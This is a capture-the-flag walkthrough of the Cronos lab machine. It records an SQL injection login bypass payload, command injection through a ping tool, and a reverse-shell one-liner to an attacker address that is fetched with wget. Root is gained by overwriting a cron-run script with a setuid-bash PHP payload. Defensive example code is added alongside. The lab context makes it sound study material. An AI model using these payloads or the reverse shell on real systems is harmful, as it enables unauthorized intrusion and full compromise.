Cronos

Recon

Let’s welcome the Apache default page again.

└──╼ $nmap -p- -A 10.129.194.97
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-15 10:15 UTC
Nmap scan report for 10.129.194.97
Host is up (0.037s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
|   256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_  256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.57 seconds

Let’s look for the domain with a reverse DNS lookup against the target itself, as DNS is clearly set up on this server for a reason.

└──╼ $dig -x 10.129.194.97 @10.129.194.97

; <<>> DiG 9.18.28-1~deb12u2-Debian <<>> -x 10.129.194.97 @10.129.194.97
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 28739
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 2

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;97.194.129.10.in-addr.arpa.	IN	PTR

;; ANSWER SECTION:
97.194.129.10.in-addr.arpa. 604800 IN	PTR	ns1.cronos.htb.

;; AUTHORITY SECTION:
129.10.in-addr.arpa.	604800	IN	NS	ns1.cronos.htb.

;; ADDITIONAL SECTION:
ns1.cronos.htb.		604800	IN	A	10.10.10.13

;; Query time: 36 msec
;; SERVER: 10.129.194.97#53(10.129.194.97) (UDP)
;; WHEN: Tue Oct 15 10:29:00 UTC 2024
;; MSG SIZE  rcvd: 113

The PTR record gives us ns1.cronos.htb, so the zone is cronos.htb. Note that the A record the server returns (10.10.10.13) is not the address we scanned, so add cronos.htb and www.cronos.htb to /etc/hosts pointing at the target IP (in my case 10.129.194.97) rather than at the address from the zone. That lets us access a new site.

Going to “Documentation” redirects us to the Laravel docs, something definitely worth investigating later. “Laracasts” goes to Laracasts, whatever that is. “News” goes to Laravel News, “Forge” goes to Laravel Forge and “GitHub” goes to Laravel’s GitHub. Quite a lot of Laravel, if you ask me. Wappalyzer does not flag it on this site, but running whatweb does (if the hint left by the author wasn’t enough). Let’s learn about it then.

$whatweb http://www.cronos.htb/
http://www.cronos.htb/ [200 OK] Apache[2.4.18], Cookies[XSRF-TOKEN,laravel_session], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], HttpOnly[laravel_session], IP[10.129.194.97], Laravel, Title[Cronos], X-UA-Compatible[IE=edge]

Laravel is “The PHP Framework for Web Artisans”, whatever that means. More interesting is that it has a few CVEs of fairly high severity. There is a lot of talk about login bypass, but we do not have a login form yet, so let’s enumerate virtual hosts.

└──╼ $gobuster vhost -w /usr/share/wordlists/seclists/Discovery/DNS/n0kovo_subdomains.txt -u http://cronos.htb  --append-domain -t 150
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:             http://cronos.htb
[+] Method:          GET
[+] Threads:         150
[+] Wordlist:        /usr/share/wordlists/seclists/Discovery/DNS/n0kovo_subdomains.txt
[+] User Agent:      gobuster/3.6
[+] Timeout:         10s
[+] Append Domain:   true
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Found: admin.cronos.htb Status: 200 [Size: 1547]
Found: ADMIN.cronos.htb Status: 200 [Size: 1547]
Found: Admin.cronos.htb Status: 200 [Size: 1547]

That’s better. The three hits differ only in case and all serve the same 1547-byte page, so there is a single admin.cronos.htb virtual host, and it presents a login form that looks custom rather than part of Laravel. Let’s attack it with sqlmap first, saving the login POST request to tmp.req.

sqlmap -r tmp.req --level 5 --risk 3 --dump -v 3
[12:26:40] [PAYLOAD] -3434' OR 9239=9239-- rKXH
got a 302 redirect to 'http://admin.cronos.htb/welcome.php'. Do you want to follow? [Y/n] 

It works: the 302 to welcome.php after the OR-based payload means the login check was bypassed, and we are greeted with Net Tool v0.1.
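To make the bypass concrete, here is an added example (not code from the box or from this write-up) of the kind of query a login form like this must be building, written in Python with an in-memory SQLite table standing in for the real backend. The table contents, the field the payload lands in (assumed to be the username) and the function names are assumptions; the payload is the one sqlmap reported above.

```python
import sqlite3

# Constructed stand-in for the admin login's user table (not the box's real data).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'not-the-real-password')")
    return db

def build_vulnerable_query(username, password):
    # The flaw: user input is spliced into the statement text itself, so a
    # quote closes the string literal and "--" comments out the password check.
    return ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
            % (username, password))

def login_vulnerable(db, username, password):
    row = db.execute(build_vulnerable_query(username, password)).fetchone()
    return row is not None

def login_parameterized(db, username, password):
    # Placeholders keep the input as data: the quote and the comment marker
    # never reach the SQL parser as syntax, so the same payload just fails.
    row = db.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    return row is not None

# The payload sqlmap reported; assumed here to land in the username field.
PAYLOAD = "-3434' OR 9239=9239-- rKXH"

if __name__ == "__main__":
    db = make_db()
    print(build_vulnerable_query(PAYLOAD, "x"))
    print("vulnerable login bypassed:", login_vulnerable(db, PAYLOAD, "x"))
    print("parameterized login bypassed:", login_parameterized(db, PAYLOAD, "x"))
```

The vulnerable query evaluates `username = '-3434' OR 9239=9239` for every row, so the first user comes back regardless of the password; with placeholders the same string is compared literally and no row matches.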

Net Tool v0.1

Net Tool lets us run ping and traceroute against a host. Looking at the requests in Burp, the command and the host are sent as two separate parameters, so ping and traceroute are not the only things we can run.

Changing command to ls and host to / works, so the server is evidently just joining both parameters into a shell command line: plain command injection.
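The flaw, as an added example written here in Python rather than the box’s PHP (this is not the Net Tool source): a handler that glues the command and host parameters into one shell string, beside a hardened version that maps the two advertised features to fixed argv lists, validates the host and never invokes a shell. The parameter names follow the request; the allowlist contents and function names are assumptions.

```python
import re
import subprocess

# Constructed allowlist standing in for the two features Net Tool advertises.
ALLOWED = {
    "ping": ["ping", "-c", "1"],
    "traceroute": ["traceroute", "-m", "5"],
}

# Hostname or IP characters only, and no leading "-" so the value can never be
# parsed as an option by the tool it is handed to (argument injection).
HOST_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9.\-]{0,252}$")

def net_tool_vulnerable(command, host):
    """Mirror of the flaw: both fields are pasted into a shell command line,
    so command=ls host=/ lists the root directory and host='x; id' runs id."""
    cmdline = "%s %s" % (command, host)
    proc = subprocess.run(cmdline, shell=True, capture_output=True, text=True)
    return proc.stdout

def net_tool_argv(command, host):
    """Hardened: the command selects a fixed argv from the allowlist and the
    host is validated; anything else is rejected before execution."""
    if command not in ALLOWED:
        raise ValueError("command not allowed: %r" % command)
    if not HOST_RE.match(host):
        raise ValueError("bad host: %r" % host)
    return ALLOWED[command] + [host]

def net_tool_hardened(command, host):
    # No shell=True: argv goes straight to execve, so metacharacters are data.
    proc = subprocess.run(net_tool_argv(command, host),
                          capture_output=True, text=True)
    return proc.stdout

if __name__ == "__main__":
    print(net_tool_vulnerable("echo", "x; echo injected"))
    print(net_tool_argv("ping", "10.129.194.97"))
    for bad in (("ls", "/"), ("ping", "8.8.8.8; id"), ("ping", "-c")):
        try:
            net_tool_argv(*bad)
        except ValueError as e:
            print("rejected:", e)
```

The demonstration uses echo in place of ping so it runs offline; the point is that with shell=True the text after “;” is executed, while the hardened path refuses it before any process is started.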


Listing /home shows us a folder noulis, but unfortunately there is no .ssh folder. We have to create a reverse shell then. I had some problems with executing sh -i >& /dev/udp/10.0.0.1/4242 0>&1 this way, so I’ve created a shell.sh file with it, fetched it on the server with wget, set up netcat and run the script. We are in.

Just the standard shell stabilisation at the end.

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
CTRL-Z
stty raw -echo; fg

We have user access, so we can read user.txt from the home folder. Time to get root.

Priv esc

Running LinEnum, we find a cron job running every minute as root, finally something involving Laravel:
* * * * * root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
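An added example, not part of the original write-up or of LinEnum, that automates the check this finding relies on: parse system crontab entries, pull the file paths out of each command and report the ones a given uid could overwrite. The sample crontab is constructed (its last line is the one found above); mode bits are checked directly rather than through os.access(), so running the check as root does not report every file as writable.

```python
import os
import re
import stat
import tempfile

# Constructed sample of /etc/crontab entries; the last one is the line LinEnum reported.
SAMPLE_CRONTAB = """\
# m h dom mon dow user  command
SHELL=/bin/sh
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
* * * * * root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
"""

# System crontab format: five schedule fields, the user, then the command.
SYSTEM_CRON_RE = re.compile(r"^\s*(\S+\s+\S+\s+\S+\s+\S+\s+\S+)\s+(\S+)\s+(.*)$")
# Absolute paths inside a command line (not preceded by a word char or slash).
PATH_RE = re.compile(r"(?<![\w/])(/[\w./-]+)")

def parse_system_crontab(text):
    """Return (schedule, user, command) for each entry, skipping comments and
    VAR=value lines."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        m = SYSTEM_CRON_RE.match(line)
        if m:
            entries.append((m.group(1), m.group(2), m.group(3)))
    return entries

def writable_by(path, uid, gids):
    """Decide from the mode bits whether uid (with these gids) could write path."""
    try:
        st = os.stat(path)
    except OSError:
        return False
    mode = st.st_mode
    if st.st_uid == uid and mode & stat.S_IWUSR:
        return True
    if st.st_gid in gids and mode & stat.S_IWGRP:
        return True
    return bool(mode & stat.S_IWOTH)

def find_writable_cron_targets(crontab_text, uid, gids):
    """(user, path) for every regular file a cron command references that uid
    could overwrite; a hit under user 'root' is a privilege escalation."""
    hits = []
    for _schedule, user, command in parse_system_crontab(crontab_text):
        for path in PATH_RE.findall(command):
            if os.path.isfile(path) and writable_by(path, uid, gids):
                hits.append((user, path))
    return hits

def demo():
    """Stand-alone run on constructed files: a world-writable 'artisan' next to
    a 0644 script, checked for a uid that owns neither. Returns the basenames hit."""
    d = tempfile.mkdtemp()
    artisan = os.path.join(d, "artisan")
    safe = os.path.join(d, "safe.sh")
    for p, mode in ((artisan, 0o666), (safe, 0o644)):
        open(p, "w").close()
        os.chmod(p, mode)
    text = ("* * * * * root php %s schedule:run >> /dev/null 2>&1\n"
            "*/5 * * * * root %s\n" % (artisan, safe))
    hits = find_writable_cron_targets(text, os.getuid() + 1, [])
    return [os.path.basename(p) for _, p in hits]

if __name__ == "__main__":
    print(parse_system_crontab(SAMPLE_CRONTAB)[-1])
    print(demo())
```

On the box the interesting hit is root running /var/www/laravel/artisan, which the low-privileged user can write; the same loop over the real /etc/crontab, with the current uid and group list, is what LinEnum’s cron section is telling you to do by hand.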

It turns out we can modify the artisan file (ls -l /var/www/laravel/artisan confirms it is writable by our user), so let’s just replace its contents with PHP of our own. Cron runs the file as root every minute, so whatever we put there executes as root.

<?php
// Runs as root from the cron job: mark /bin/bash setuid so our user can
// start it as root with bash -p.
shell_exec('chmod u+s /bin/bash');
?>

Wait for the next minute, then run /bin/bash -p (the -p flag stops bash from dropping the effective uid granted by the setuid bit) and we have a root shell. Nice and simple. We didn’t exploit Laravel itself, only the cron job that runs its artisan script as root.